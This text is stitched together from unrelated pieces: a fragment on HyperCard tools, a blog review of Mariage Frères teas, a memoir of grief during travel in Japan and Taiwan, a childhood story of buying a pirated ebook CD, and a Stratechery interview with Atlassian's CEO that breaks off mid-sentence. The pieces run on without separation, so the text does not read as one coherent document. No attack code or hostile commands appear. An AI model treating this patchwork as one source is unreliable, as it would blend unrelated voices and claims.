I also see misaligned images and buttons at times, but otherwise it's a great presentation. It can also export a stack to HTML. WyldCard , a Java implementation, was updated in 2024. Needs a little knowhow to get your Java build environment set up, and I'm unclear if it can import original stacks. hypercard-stack-importer says it will convert a stack to HTML Built-in sound support is woeful. What you build is essentially constrained to the classic Macintosh ecosystem (though you may find a way to convert the stack; see above) The script editor is too bare bones for those who aspire to Myst -like greatness. Color support is a 3rd party afterthought. Textual hyperlinks can really only be faked through button overlays. It is possible to use HyperTalk to grab a clicked word in a text field, which might be enough context to make a decision upon. HyperTalk can be frustrating when implementing advanced ideas. YMMV.

0 views
Brain Baking 1 months ago

Mariage Frères Tea Reviews

It’s been almost five years since I wrote about tea. We just Refreshed our Supplies ( get it? ) and feel the need to store my thoughts on the various Mariage Frères (MF) teas we’ve bought over the years. I’ve been a faithful fan ever since drinking a Mariage Frères teabag on a team building session somewhere in 2012. Call me a snob, and while Palais des Thés and Whittard are generally a great choice as well, most MF teas are simply better. I even went to Paris and London just to get a new batch of MF tea. Their webshop was non-existent—it still is crappy now but functional. As they ship from France, shipping to Belgium usually is . No worries though, add a couple of hundred grams and you’ll hit the free shipping quota in no-time. Ouch. This post was inspired by Seb’s tea reviews post . Seb employs Day of the Tentacle Hoagies to score the teas. Since my retro gaming codex uses Goblins 3 Blounts , it seemed appropriate to apply here as well. Consider this my personal Steepster database . The following list is a reconstruction of purchase histories from my notebooks: Bloomfield Darjeeling A spring first flush tea labelled SFTGFOP1 : Super Fine Tippy Golden Flowery Orange Pekoe. Don’t worry if your initial reaction to that is Huh? : it’s a tea grading term denoting this is one of the highest qualities Dajeerling tea you can get, with the worst being labelled as D : Dust. That’s what inside a regular tea bag. Schol . I love this Bloomfield. It’s the best Darjeeling I ever gulped down. It’s also one of the most expensive coming in at around per (in 2022, that was !). It’s subtle, not bitter if you steep it too long, has a lovely golden colour, can be re-steeped, and does not hit as hard as longer fermented black teas. 5 out of 5 Blounts—Amazing. Namring Royal Upper I’m a big fan of Darjeeling tea: here’s another high quality variant from one of the oldest and largest tea estates in the Indian city. I love to think it looks as picturesque as this Wikipedia plantation photo , but in reality, it will no doubt be a lot of hard work to carefully pluck the best Orange Pekoe leaves each season. We bought Namring to see if Bloomfield could be beaten. It couldn’t—the difference is negligible and this one is even more expensive. Still great, though. 4 out of 5 Blounts—Great. Earl Grey Provence This must have been the first typical black Mariage Frères canister I’ve ever bought. I chanced upon it whilst Christmas shopping in a new cooking shop in my home town that’s unfortunately long gone now. Earl Grey Provence is what it says it is: it’s Earl Grey tea with a dose of Provence: lavender. My wife thinks it smells like bath water when I prepare a cup, but I don’t care. The combination is perfect, and the smell is more intense than the taste. It’s not the highest quality/biggest leaves black tea they selected for this mix but it’s not expensive either. If you like your Grey Earl -y (ha!) in the morning, try adding some lavender. Ingenious. 5 out of 5 Blounts—Amazing. Roi Des Earl Grey We must have bought kilos of Early Grey Provence , so to spice things up, last year I bought another Earl Grey variant: the king of the Earl Greys. Well… not so much. It’s good, but the typical citrus-y flavour comes on a bit too strong in this one, since there’s nothing else in it. I’ll consider buying it again once in a while but it won’t beat Provence. 3 out of 5 Blounts—Good. Chaï Chandernagor Like I told you, I’m a sucker for Indian tea when it comes to black ones, and “chaï” is not an exception. The term is usually used in the west (or at least here?) to describe spiced black tea where adding a dollop of milk is maybe perhaps a little bit allowed. This mix doesn’t just have cloves but some ginger and other stuff as well. Unfortunately, the black tea as a base is of relatively low quality and quite fine-grained. I’ll admit: I prefer Palais des Thés’ simpler but more robust Chaï— not the Imperial one with the red pepper but the one with just cloves. 3 out of 5 Blounts—Good. Chaï Parisien Another variant of spiced black tea with mellow fruity notes that come across as too mellow to me. If I want to drink a spiced black tea, I want to feel the kicker, not try to get the tongue tingled with “mellow fruity notes”. This one wasn’t what I expect of a “chaï”. 2 out of 5 Blounts—Mediocre. A selection of the typical black Mariage Frères tea canisters from our cupboard. The first MF tea I ever tasted and the one that got me hooked. It’s a pure Japanese sencha tea grown near the foot of the Fuji-Yama mountain with that typical grassy flavour. The dried leaves even are long and small, reminiscent of dried grass. It’s easy to screw up a batch by using too hot water or letting it steep for too long. It’s been a while since we bought it because we’re venturing into other flavours right now, but you can’t go wrong with this if you’re looking for a clean well-rounded tea to drink all day. Sencha is the most popular tea in Japan. If prepared well, the result is an appealingly looking greenish liquid. If overdone or prepared with too hot water, it’ll yellow. 4 out of 5 Blounts—Great. Tamaryokucha A grassy variant of the above that edges to the too grassy side for me. Weird, as tamaryokucha is usually considered milder than typical sencha tea. I cleaned out the tin today: we bought it over six years ago and I threw out almost half of it. Not because it’s bad, but because you’ve got to be in the right mood to drink this and there are others that somehow find their way into the tea strainer before it. Maybe try out Fuji-Yama first? The term Ryokucha literally translates to “green tea” and is the parent category of sencha (steamed) and other pan-fried green teas. It’s again unoxidized hence its bright green hue. Mental note: I should explore more Japanese teas. 3 out of 5 Blounts—Good. Thai Mountain (rebranded to Royal Thai Tea) According to MF, “A gourmet tea that whisks us away to the heart of Asia”. The tea leaves are hand-rolled into tiny balls that slowly open as it steeps, unleashing round milky flavours. It’s hard to describe and not very cheap but you only need a few “balls” and it can be re-steeped multiple times. It’s unique enough to warrant a spot in your tea cabinet, although I’m unsure about its staying qualities. It was gifted to me and I have yet to buy a new batch, but I welcomed the occasional Thai Mountain cup during the day. 4 out of 5 Blounts—Great. Not necessarily to be categorized as “pure”. Another typical Japanese green tea mixed with roasted rice. I have yet to drink this one but bought it because the last genmai cha I got from the Portland Japanese Garden was amazing, although that one also contained a bit of matcha. To be rated soon! Marco Polo Vert This is MF’s flagship tea that’s available as black, green, blue (yeah don’t ask), and white teas. It’s got a balanced flowery and fruity taste that leans towards vanilla—literally and figuratively. The tea is a good entry point towards more flowery/sweet-ish green teas—it’s their flagship for a reason—if that is what you’re after. After we finished our supply, I don’t think I’m inclined to buy more. 3 out of 5 Blounts—Good. A beautiful limited edition canister served for a beautiful price (at this point of writing a dazzling per ) but worth it if you’re a true tea believer. The green tea selected for this delicate infusion of plum blossoms is great and the fruity tones are not overwhelming. It’s simply a superb fruity green tea. Too bad that stupid canister and the limited availability drives up the price. 5 out of 5 Blounts—Amazing. Sakura 2000 One of the first fruity MF green teas that we tried and we keep reaching for. Personally, I’d prefer Ume, but given the big price difference and the fact that my wife prefers cherry blossom over plum blossom, we always buy a package of Sakura when ordering online. The flavour is perhaps a bit too much and after years of drinking it, it can get a bit repetitive, but if you don’t know what fruity tea to get and your budget is limited, make it this one. 4 out of 5 Blounts—Great. Sweet Shanghaï A rather heavily perfumed tea with hints and notes of a bit of everything, from rose leaves to exotic fruits. I liked it a lot at first, but the more I drank it, the less enthusiastic I became. I’d rather have a single dominating flavour than a sweet Shanghaï explosion. Still, I wouldn’t say no to it. It’s on par with Marco Polo, I guess. 3 out of 5 Blounts—Good. Vert Amande I used to be very into almonds. I still like a good chunk of marzipan during the local Sinterklaas festivities, but it should stay outside my tea, thank you very much. Almond scented tea tends to become almond water with traces of tea, and this one is no exception. 1 out of 5 Blounts—Bad. Jasmin Imperial “‘The King of Jasmine Teas’ is made with very rare green tea.”, as stated by MF. As jasmine green tea fans, We tried three different jasmine flavours, and this one hits the sweet spot, although the differences are perhaps too small. The added difficulty is that we stocked these three teas at different times so couldn’t do a direct comparison. Feel free to pick whatever you desire, but a jasmine green tea should always be part of your default tea attire. 4 out of 5 Blounts—Great. Grand Jasmin Beauty Brown-silver dried green tea buds/leaves that result in a golden liquid which can be easily confused by Darjeeling tea. It’s still jasmine, only at per , a bit too expensive to notice the biggest difference in flavour. I’m sure objectively speaking it’s got a slight edge over Jasmin Imperial. 4 out of 5 Blounts—Great. Jasmin Monkey King Green tea from Hunan scented with jasmine flowers. More gray-greenish than the jasmine teas above. We found this one to be the least impressive jasmine tea—I think? It’s been a while, this year we only stocked Jasmin Imperial. As far as I can remember, it was still good. 3 out of 5 Blounts—Good. I was curious about pure white tea but now I’m not any more. It’s just not for me: it tastes like… nothing? White tea is very delicate, and perhaps my Earl Grey Provence and spiced Chaï got my taste buds confused. The leaves are beautiful, and however I try to prepare it, I just don’t like it. I’d rather not drink it. 1 out of 5 Blounts—Bad. Pavillon De Laque Same problem as Paï Mu Tan but slightly less so due to the added fragrances of mild spices. The blue flowers lend it a nice and colourful touch but for us it’s not a saving grace. I guess we’re just not white tea people. The fact that this tea is the most expensive in this entire list— per —doesn’t make it better. I kind of feel cheated. 2 out of 5 Blounts—Mediocre. White Rhapsody Just when I thought “okay let’s skip all white teas from now on”, my mother-in-law gifts me a canister of White Rhapsody. I read the label—scented white tea—and moan. Still, I politely accept the gift, put on the kettle, and take a sip. Holy shit! This tea is amazing! I don’t know what MF did to make this work, or perhaps it’s because we drink a lot of flowery green tea, but I love the combination of what they call “summery nuances evoking peach, apricot and fig”. Highly recommended. I was distraught when I learned it was out of stock when I placed a new order last week. 5 out of 5 Blounts—Amazing. Rouge Pleine Lune This one’s a rooibos tea mostly flavoured with almonds. And despite my last remark about almonds in teas, this time, the combination seems to mostly work. I’m not a huge rooibos expert and only occasionally drink it plain. We’ve had this one in a back shelf for years and I recently decided to give it another go. It’s not half bad but I wouldn’t be inclined to order more. 3 out of 5 Blounts—Good. Pu-erh Suprême Curious to fermented pu-erh teas, I ordered my first one last week. I just had a cup and must have done something wrong: it was surprisingly bland. Perhaps it needs more heat, I treated it like green tea. I’ll give it a few more goes before putting up a rating. To be rated soon! Related topics: / tea / By Wouter Groeneveld on 11 December 2025.  Reply via email .

0 views
Alex White's Blog 1 months ago

A Difficult Memory of Travel

This is going to be a very different post from my normal. Not tech related, but instead a personal note meant to capture a memory that entered my head today. This post is emotional, and deals with death. I won't be offended if you skip it (heck I won't know). As I drove my son to daycare this morning, a soft rain pattered the windshield. Something about the dreary, rainy morning triggered my mind to start reminisce on my time in Japan and Taiwan years ago. I want to use this post to capture those memories. I've already started to forget details, so I'd like to remember what I can before they completely fade away. 2017 was a turbulent year for me. It started with a new job, which I later came to label “the most toxic place I ever worked”. On the plus side, it was fully remote (as in, manager lived in Japan). When I accepted the offer, I had the condition that I would be allowed to work from anywhere as well, not just the United States. To this end, I planned a month-long trip working in Japan and Taiwan in December. That fall, while sitting in the living room with my fiance (now wife), I got a call from one of my cousins. My father, who I hadn't talked to in years (my parents had a messy divorce), had late stage cancer. Despite the anger and trouble that had separated my father and I, I absolutely fell apart (much harder than I expected to be honest). The next week my wife and I drove to Virginia to visit my father. Not only was this my first time seeing my father in years, but also his first time meeting my future wife. I think I managed to hold it together when we arrived, but I know I fell apart again once we retreated to our room. He was in bad shape, and not very responsive. My last memory with my dad was saying goodbye to him as he laid on the bed. He was showing me the bell he had that let him ring if he needed anything. He then offered me some of his gummy bears. The same brand he and I had always munched on before a night long marathon of Gran Turismo on the PS1 when I was a kid. And then we said goodbye. I remember being convinced I was going to cancel my trip abroad that was fast approaching. I didn't want to be so far away from my dad. But the truth was, we were back in Ohio and there was nothing I could do. My family convinced me to follow through with the trip considering everything was already booked. That December I landed at Narita International Airport outside of Tokyo. It was a rainy evening as I took the Narita Airport Express, then several local transfers to my destination station, Asaka Station in Saitama. As I exited the station, a Takoyaki stand caught my eye, so I loaded up on octopus balls to serve as my dinner. The Airbnb I was staying at was about a 15 minute walk from the station. At one point during the walk, I climbed up a hill following the winding road. There was a beautiful view of the prefecture, the kind of view that gives you shivers as you realize how far from home you are. I arrived at the Airbnb, nestled in a residential area with a beautiful park across the street. Airbnbs were (maybe still are) considered short-term apartment leases in Japan, so the first step after arriving is to fill out a leasing application and leave it in the mailbox. After the necessary forms were signed (I unfortunately did not remember to take my Hanko), I chowed down on Takoyaki and slept through the jet lag. If you're familiar with the Tokyo area, you might be asking "why stay way out in Saitama?". I am familiar with the area, in 2012 I spent a semester at Musashi University. My dorm was in Asaka, so the area has a special place in my heart. The next morning (or afternoon, I think I slept for awhile) I spent the day down memory lane, visiting places from my college days. I saw my old dorm, traced the paths I took to school and visited my favorite Indian restaurant in Tokyo. I still had a lunch coupon I had kept from 2012 for the restaurant, but unfortunately they said it had expired. It was worth a shot though! That night I arrived back to the Airbnb. I decided to give my grandmother a call to check in on things. I don't remember the conversation, but I do remember at one point she said with confusion "wait, nobody's told you yet?". She informed me my father had passed away while I was on my flight. Surprisingly I held myself together when I learned the news. As the weekend ended, I started going to a co-working spot to work. I continued exploring at night. In a few days, I was to visit my manager (let’s call him K) and stay at his house in Nikko for two nights. I seemed to be doing okay. But sometimes fate is cruel. To be honest, I don't remember the timeline very well. I think it was a few days after hearing about my dad that my mom called. Her mother had passed away unexpectedly. And yet, somehow, I was still okay. What else could I do? Stuck on the other side of the world, far from my family. I remember leaving the train to Nikko to stay with K. I was confused as the doors didn't open automatically like they usually do. An older woman showed me you had to press a button to open them. I guess it gets so cold and snowy in the area, they don't want to let the cold and snow in if they don't have to. K picked me up from the station and drove me to their house in the countryside. It was a beautiful house he and his dad had restored. A mix of Japanese and American influence. We had Korean BBQ for dinner in the small town with his wife and kids. The next morning, we played hooky and went on a trip into the mountains. It felt like we were in Initial D, driving along the winding roads (in fact we might have been, I've never looked it up but the road seemed nearly identical to the one in the movie). We visited a temple at the top of a mountain. As we walked up the steps, the silence struck me. A gravel path led through a tunnel of trees that blocked out the sky. K apologized that we couldn't see the view due to the fog. Honestly I couldn't have imagined a more beautiful view as it was. After our trip through the mountains we stopped at a roadside ramen restaurant. It's funny how much bigger the bowls of ramen are in Japan for 1/5 the price as in the US. The next day I was back on the train to Tokyo. In 2 days I had a flight to Taipei to catch. The night before my flight, I met up with an old friend that had been in my exchange group. He had managed to stay in Tokyo as a JET teacher. We visited an Izakaya in Ikebukuro for a few drinks. After saying our goodbyes, I boarded the train to Ueno. I remember after exploring the shrines I walked down to the water. As I stared across the water at the city, the grief finally hit me. I tried to somewhat keep my composure, but tears blurred my vision while I headed through the crowds back to the station. 24 hours later, I was in a new Airbnb, minutes away from the Shilin night market in my favorite city in the world, Taipei. I spent 3 weeks in Taiwan, working out of various coffee shops and a co-working spot called Project 0.1. I met a lot of amazing people at the co-working spot. We had lunches and breakfasts together and visited the night market. I spent time at the Beitou public library which must be one of the most beautiful buildings on Earth. Nestled in the middle of the hot spring district, it's a large wooden building that looks and smells exactly like you'd hope a hot spring library does. Near the end of my trip, I went on a weekend visit to Kaohsiung for my birthday. Located in the southernmost part of Taiwan, Kaohsiung is about a 2 hour high-speed rail trip from Taipei. A port city, Kaohsiung is right on the water with large cargo ships coming and going. It was a lot less chaotic than Taipei, and there's a bustling art scene in the docks district. I spent a night wondering around shipping containers converted to cafes as a group sang Christmas songs on the sidewalk. My second night in Kaohsiung I stumbled upon a building that had a kisok for scanning your train/travel card to pay. Figuring it was some kind of public transport, I scanned and entered the lobby, curious where I’d end up. It turned out to be a ferry that took me Wusong, a small island next to the city. Upon disembarking, I wondered down a beach until I came upon a small coffee shop in the middle of the sand. I sat with a latte, enjoying the view. Next to me, an elderly man with 10 cell phones running Pokemon Go took note of each Pokemon he encountered in a small notebook. Having finished my latte, I followed the path to a long tunnel cutting through the mountain. Two fisherman tried to converse with me as we walked along the path. My mandarin was a lot worse back then (not saying it’s great now either), and they quickly gave up. As the sun set, I found myself on top of the mountain (maybe large hill is more accurate). I had stumbled upon Cihou Fort, an old fortress that used to guard the entrance to Kaohsiung harbor. I sat on some rocks, looking over the town below. A familiar song drifted through the air as a garbage truck far below collected trash (garbage trucks in Taiwan play music so people know to bring out their trash). Before heading back to the city, I grabbed a beer at a beach side bar and watched the waves. On my birthday, I decided to treat myself to the newly released Star Wars movie. It was a small theater, maybe 2 screens. As I was purchasing my ticket, an American and his wife approached. “Want to watch with us and have a beer?” he asked as he held up a 6-pack. It was a great movie, made better with my new friends. The next night I explored the Love River. I hired a small boat to take me around. After, I grabbed a drink at a bar next to the water and listened to a live redemption of “One Night in Beijing” from some slightly intoxicated patrons. As I was gearing up to head back to the hotel, I walked along an old railroad track that overlooked the river. Leaning against the railing, watching the boats glowing with neon lights, the grief visited me again. I spent awhile on that bridge, attempting to work through my emotions. That night is probably the strongest memory I have of the trip. A few days later I was back home in Ohio with my fiance, our dog and our cats. It was a difficult trip, but also an amazing one that shaped my life. It was hard working through the grief, especially without family, but I met a lot of friends that helped me get through it. One is never done with grief, writing this article has brought me close to tears again, but it does get easier. Reflecting on the time, I can also be thankful for those last moments with my father and the support of my family. When my son and daughter are older, I want to take them back to that bridge overlooking the river in Kaohsiung. I hope to confront those emotions again, but with them by my side. I want to be there for them in a way my own father wasn’t. This article is more for me than the readers, so I apologize for that. It feels good to write this though, and if you did read through it I’m more than happy to chat about adventures in Taiwan or Japan! I’ve been to both countries twice and have extremely fond memories of both, and so many stories (like the crazy bus driver of Jiufen, the terrifying Maokong Gondola ride, being lost and found in Sapporo and discovering Okonomiyaki in Ekoda).

0 views
Ankur Sethi 1 months ago

My first online shopping experience, at the tender age of twelve

I wrote the first draft of this post as an exercise during a meeting of IndieWebClub Bangalore . When I was eleven or twelve, a friend at school told me that video games like Age of Empires were built using a language called C. When pressed for details, he had nothing more to tell me. What did he mean by language? Was it like English? How could you use a language to make things move around on the computer screen? He didn’t know. His older brother had informed him about the existence of C and its relationship with video games, but he had inquired no further. I was desperate to learn C, whatever it was. Only, I had no idea who to ask or how to go about learning this "language". I could've searched the web, but this was 2002. If I was lucky, I was allowed to use the dial-up for an hour every week. Search engines were bad and my search skills were rudimentary. The web was not yet filled with thousands upon thousands of freely available programming tutorials. And in any case, it was far more important to download the latest Linkin’ Park MP3. Luckily, Dad knew somebody who worked at the National Institute for Science Communication and Policy Research . They had just published a series of computer education books targeted towards an increasing population of new computer users. My dad had mentioned to him that I was interested in computers, so one day he handed him a giant brown envelope containing two books: a book about the basics of Microsoft PowerPoint, and a slim volume called The C Adventure . The C Adventure only covered the very basics of C: variables, conditionals, loops, and functions. It didn't cover structs, pointers, macros, splitting programs into multiple files, build systems, or anything else that would allow me to build the kind of real-world programs I wanted to build. But that didn't matter. The universe had heard my plea. I finally knew what C was. I could even write a bit of it! They were simple programs that ran in the terminal, but at the time I felt drunk with power. I was one step closer to building Age of Empires . I could do anything with a computer, anything at all. The only limit was myself . But The C Adventure wasn't enough. If I wanted to build games, there was a lot more I’d need to learn: reading and writing files, connecting to the internet, opening windows, rendering 3D graphics, playing sound, writing game AI, and who knew what else. But once again, I didn't know where to find more learning resources. The government had come to my aid once, but I couldn't rely on obscure government departments to come to my aid every time. I had to take matters into my own hands. And I did just that, this time finding my salvation in the free market. I had no idea where to buy programming books in Delhi, but I reasoned that it might be possible to buy them on the internet. I’d visited American e-commerce websites. Might there be Indian equivalents? I’d seen TV and newspaper ads for a website called Baazee.com. The ads said something about buying and selling. Perhaps this was where I’d find my next C book? One evening, during my one weekly hour of parentally approved and monitored internet session, I typed Baazee.com into the Internet Explorer 6 URL bar and began my search. A few minutes of searching led me to a product called "101 Programming eBooks". It was allegedly a CD containing, well, 101 programming ebooks. The seller had good reviews, and the product description looked compelling so, with an excess of hope, I clicked the buy button. At the end of the checkout process, the website asked for my credit card details, and that’s where I realized my whole endeavor had been doomed from the very start. The problem was that my parents didn't have a credit card at the time, and no amount of convincing on my part would induce them to get one. They’d heard too many horror stories of people getting deep into credit card debt and losing their homes. The newspapers were filled with stories of scams and frauds on the nascent internet, most of which involved stealing people’s credit card details and using them to run up huge bills. But teenage Ankur needed to learn C. It was a life and death situation, couldn't they see? I would not allow my parents’ stubborn disapproval of predatory American financial instruments to stand between myself and Age of Empires . So I did what anyone in my place would have done: I begged my Dad to get a credit card, just this once, just for this one purchase. I threw a tantrum. I cried until I ran out of tears. But nope, it was all in vain. Computers and money were not allowed to mix, not in our household. No credit cards, full stop. Dejected, I went back to the computer to close all my Internet Explorer 6 windows, when the universe once again chose to smile upon me. The person selling "101 Programming Ebooks" had left their email address on the product description page! Dad urged me to write to them and figure out if we could pay for the CD with cash or cheque. So I sent an email, and the seller responded with his phone number. He lived in Delhi, not very far from where my family lived. He said we could pick up the CD from his address and pay him in cash. Oh sweet joy! Oh divine providence! I wanted to go meet the seller myself, and do so immediately. But Dad was more cautious. He first talked to the seller on the phone to make sure he was a real person. He asked him a bunch of questions. When he was satisfied that nothing shady was going on, he went to pick up the CD himself. He might have taken a friend or co-worker with him. He’d read enough scary stories about the internet in the newspapers, and he did not want to appear on page seven or whatever of Times of India . The seller was just a college kid, still in his early twenties. He was pirating ebooks, burning them to CDs, and selling them online out of his bedroom for some extra cash. My dad was impressed by the entrepreneurial spirit on display, but neither him nor I understood that selling pirated ebooks was illegal. It didn’t matter, though. Everything that had to do with computers and the internet in India was illegal in the 2000s, so nobody cared. One joyous evening Dad returned home with the CD. It came in an unmarked white paper envelope, with the words “101 Programming Ebooks” scrawled on the disc in permanent marker. I inserted the disc into the family computer and found it contained exactly what had been advertised: a collection of technical ebooks sorted into directories, mostly published by O’Reilly, in PDF and CHM formats. In fact, there were a lot more than just 101 ebooks in there! My first online purchase had turned out to be incredibly satisfying. The Baazee.com pirate had underpromised and overdelivered. I spent a lot of time reading the books on that CD. I don’t remember if I ever read any single one of them cover to cover, but I remember dipping in and out of tens of them, picking up something at random whenever the fancy struck me. I remember learning a bit of Perl and writing some simple programs. I remember trying to learn Java but being turned off by . I remember spending hours reading a book about XML but having no clue why I would want to use it. Could I use it to build Age of Empires ? No? Then I didn't care. I never ended up building my own version of Age of Empires , but I did go on to use some of the books in the collection to learn and use C (and some C++) profitably for many small projects. Later, when I was in college I even learned some Objective-C, and made a bit of money building an iPad game for a small marketing agency. So technically I’ve been paid to build a video game, and technically some part of it was built with C. Success? Let’s call it a success. While no single book on the “101 Programming Ebooks” CD changed my life, the collection gave me a vast buffet of tools and technologies to sample from. It expanded my mind and allowed me to see the full spectrum of possibilities in a computer career. Looking back at that event 23 years later, the only book I can remember clearly is the Camel Book , but I’m sure there were many more in that collection that I used to occupy slow evenings. I sometimes wonder where that college kid is now, the one who was selling pirated ebooks out of his bedroom. Did he go on to start his own tech company? Did he move to America, as so many people in tech do? Or does he still live somewhere in Delhi, ripping Hindi TV shows off Amazon Prime and helping people jailbreak their Nintendo Switches? Wherever he is, I hope he’s done well for himself. I am forever grateful for “101 Programming Ebooks” and the wild-west internet of the 2000s.

0 views
Stratechery 1 months ago

An Interview with Atlassian CEO Mike Cannon-Brookes About Atlassian and AI

Good morning, This week’s Stratechery Interview is with Atlassian founder and CEO Mike Cannon-Brookes . Cannon-Brookes and Scott Farquhar — whom I interviewed in 2017 — founded Atlassian in 2002; their first product was Jira, a project and issue-tracking tool, followed by Confluence, a team collaboration platform. Atlassian, thanks in part to their location in Australia, pioneered several critical innovations, including downloadable software and a self-serve business model; over the ensuing two decades Atlassian has moved to the cloud and greatly expanded their offering, and is now leaning into AI. In this interview we discuss that entire journey, including Cannon-Brookes’ desire to not have a job, how the absence of venture capital shaped the company, and how the company’s go-to-market approach has evolved. We then dive into AI, including why Cannon-Brookes believes that there will be more developers doing more, and why Atlassian’s position in the enterprise lets them create compelling offerings. Finally we discuss Atlassian’s sponsorship of Williams, the F1 race team, and why Cannon-Brookes thinks they can both help Williams win and also accrue big benefits for Atlassian. To repeat a disclosure I have long made in my Ethics Statement , I did, in the earliest years of Stratechery, take on consulting work for a limited number of companies, including Atlassian. And, for what it’s worth, I’m also a huge F1 fan! Go Max. As a reminder, all Stratechery content, including interviews, is available as a podcast; click the link at the top of this email to add Stratechery to your podcast player. On to the Interview: This interview is lightly edited for content and clarity. Mike Cannon-Brooks, welcome to Stratechery. MCB: Thank you for having me, Ben. So this is admittedly a new experience for me, I’ve already interviewed the founder of Atlassian , but it wasn’t you. I’m of course referring to Scott [Farquhar] . That was eight years ago, actually, before I even had podcasts. It was very brief, but hey, like I said, new experiences. MCB: That’s true. That’s true. And you wrote a consulting paper for us in 2014! I was going to disclose, yes, in the very brief period where I did consulting work, you flew me down to Sydney for a week, I had a chance to learn a lot about Atlassian. And on a personal note, that consulting contract helped me a lot, that was when I was just starting. It’s funny how small the numbers seem in retrospect, but maybe that’s why I’ve shied away from writing about you too much over the years, because it meant a lot to me. So I appreciate it and there’s my disclosure for the interview. MCB: Thank you. It’s a good piece of work. Don’t forget, ironically, we started as a consulting and services business and then decided that software was a better business model, so I think you did the same thing. You went the scalability route instead of the consulting work via Sydney. Absolutely. I’m not doing anything that doesn’t scale anymore, but I did love visiting Sydney, so it was great. MCB: Still, we pulled out the old consulting paper you wrote for us in 2014. Why are we going to win, why are we going to lose, everything else, it was classic Ben work. Was it good? MCB: It’s pretty good! It’s interesting, I’d probably be embarrassed if I read it today. Anyhow, the good news is that since it’s the first time I’m interviewing you, I do get to do my favorite segment, which is learning more about you. Where did you grow up, but also, where were you born? I know they were different places. Then, how’d you get interested in technology and what’s your version of the Atlassian origin story? MCB: Sure, I feel like I’ve heard this question 1,000 times! Where to start? My dad was in banking, he joined the glorious institution that is Citibank today, from England. Parents are both from Cambridge and bounced around the world a lot as part of that job. Took the, “Hey, we need someone to go to this country”, and he was like, “I’ll take that”. So I was born in America, in a period I lived in New York. To be honest, lived there for three months before I moved to Taiwan. Really? Whoa. I didn’t know that. MCB: Yeah, in 1980 when it was very different than what it is today. Yeah. Were you saving that to drop that off me? I had no idea. I thought you went straight from America to Australia. MCB: I only just thought about it about 30 seconds ago, actually. No, I went to Taiwan for a few years, lived in Hong Kong for a few years, went to Australia for a few years. So how I got into technology is actually related because my parents were moving around so much, the logic was being English, that they would send us to English boarding schools and that would be a stable thing while they were moving once we got old enough. So at the mighty age of seven, I was put on Qantas and sent to England and back four times a year to go to boarding school in England for about five, six years. Because of that boarding school, I have one of the lowest frequent flyer numbers in Australia, they introduced the frequent flyer program and that was at the end of year one or end of year two. I get given this catalog by my parents and how you’ve earned all these points, “What do you want to buy?”, and it’s like, “I don’t know, trips, winery things, booze”, I’m flicking through this catalog and I’m like, “There’s literally nothing in this catalog”, of gear that you used to be able to get that I wanted and at the back is this computer, so I was like, “I guess I’ll get that”. The only thing that was potentially age appropriate. MCB: That was the only thing in the catalog, I didn’t want a toaster, I didn’t want wine, so that became my first computer, the mighty Amstrad PC20 . Four colors, no hard drive. Eventually, I bought an external floppy drive, so you could put in two and did buy magazines and type in programs and write games and stuff from magazines and play with it, played a lot of video games basically back in that era. I was into computers peripherally all through high school, came back to Australia at 12, my parents had settled here by then and weren’t moving, and so I came back here, did all high school and university here. In high school, I was always going to be an architect, that was my dream the entire way through, but come to the end of grade 12, applied for a bunch of scholarships, because university, applied for the scholarships, ended up getting one and so I thought, “Oh, well, maybe I’ll take that”, and it was in a course called BIT. Basically, half computer science, half finance and economics, but it was 15 grand a year, tax-free, so I was like, “Well, I’ll do that for a while and go back to the architecture thing”. Of course, famously in that scholarship, I met my first business partner of my first startup, met my second business partner of the second startup, they went in radically different directions in terms of outcome, but it was just 30 kids right at the right time, did the dot-com era thing. Now, ironically, as a part of that scholarship, you had to spend six months in three industrial placements, so the origin story of Atlassian comes from then a little bit, because those industrial placements were so boring. Scott spent six months installing Windows at a large corporate and he was crazy freaking smart and it was like, “Hey, go from computer to computer and upgrade to Windows 98”, or whatever it was. It was like, “Guys, this is our life, this is going to be horrible”. I worked for Nortel Bay Networks, which was a good, at the time, massive competitor, Cisco then completely disappeared and so a good tech lesson in and of itself, I basically cataloged the room full of networking gear and routers, it was mind-numbingly boring. So towards the end of the university course, I famously sent an email to a few people saying, “Look, I don’t really want to get a real job, why don’t we start a company and we’ll try some stuff?”. And this was after the dot-com era? This was the early 2000s? MCB: This was after the dot-com era, yeah. So I lived through the dot-com era actually as a journalist and writer, analyst and technology. I worked for a company called Internet.com, which became Jupiter Media and Jupiter Research and that was great, that was an amazing era for me. We ran events, newsletters, what would’ve been podcasts, didn’t have them back then. And we ran events on Mobile Monday, I think one of them was called and it was all about WAP and— Well, the real secret is you’re not the only one. There are some founders that are very successful, that they’re like, “Look, I just want to pontificate about technology”. MCB: A little bit like you, I remember getting in a lot of trouble from some of the startups, because some company would launch and I wrote basically 500 words on, “This thing’s never going to work, this is a disaster of an idea”, and they would ring up and yell at my boss and he was awesome, he’d be like, “Dude, just keep writing what you think”, and it didn’t make you very popular as a journalist type. Anyway, emailed some people, tried to start a business, we didn’t actually know what we were going to do. Atlassian has, I always tell people, a terrible origin story. You should not copy us. You just didn’t want to be installing Windows or upgrading software. MCB: We literally did not want to get a real job. And Scott replied and said, “Yeah, sure, I’m in for trying that”. He was one of the smartest kids in our class and his nickname is Skip, because he was the president of our student association and always a leader type and Eagle Scout and everything else, so we’re like, “Yeah, okay, let’s do that, we’re good mates” — and that started Atlassian. We picked the name in about five minutes, which if you consulted any branding company, would not have been chosen. Ironically, originally, we were going to do customer service and consulting, that was what the gig was. Hence the name, because Atlas was a Greek titan whose job was to stand on top of the Atlas Mountains and hold up the sky, that’s what he was supposed to be doing. He was a bad guy, so his punishment was to hold the sky up and we thought that was an act of legendary service, and so we were going to provide legendary service by holding up the sky for customers and as I said, did the service thing for about six months, decided that this is a terrible business. People paying us $350 US to answer their questions and didn’t scale and was at crazy hours of the morning and night and everything else. So in the meantime, we wrote the first version of what became Jira . We actually wrote three pieces of software, one was a knowledge basey type tool, one was a mail archiving tool for groups, so you could see each other’s email as a shared archiving. And were you seeing this and you were building tools for yourself, for your consulting business? MCB: Literally, yes, exactly. So all three were tools that we needed for ourselves. People would email us and I couldn’t see Scott’s email and he couldn’t see mine at the time and it was like this is silly, and we built Jira to handle questions and issues and problems that we were having ourselves that became a teeny bit popular. There was this glimmer that someone else cared, so we poured all the effort into that. What was that? What was the glimmer? Because this is when Agile is taking over software development and at least the legend is Jira and Agile go hand in hand, is that a correct characterization? MCB: A little bit, but this is actually pre-Agile. So Jira comes out before Agile is even a thing. I think it was about two or three years before we had any version of marketing or feature sets that involved Agile. This was just a web-based, at the time, a bug 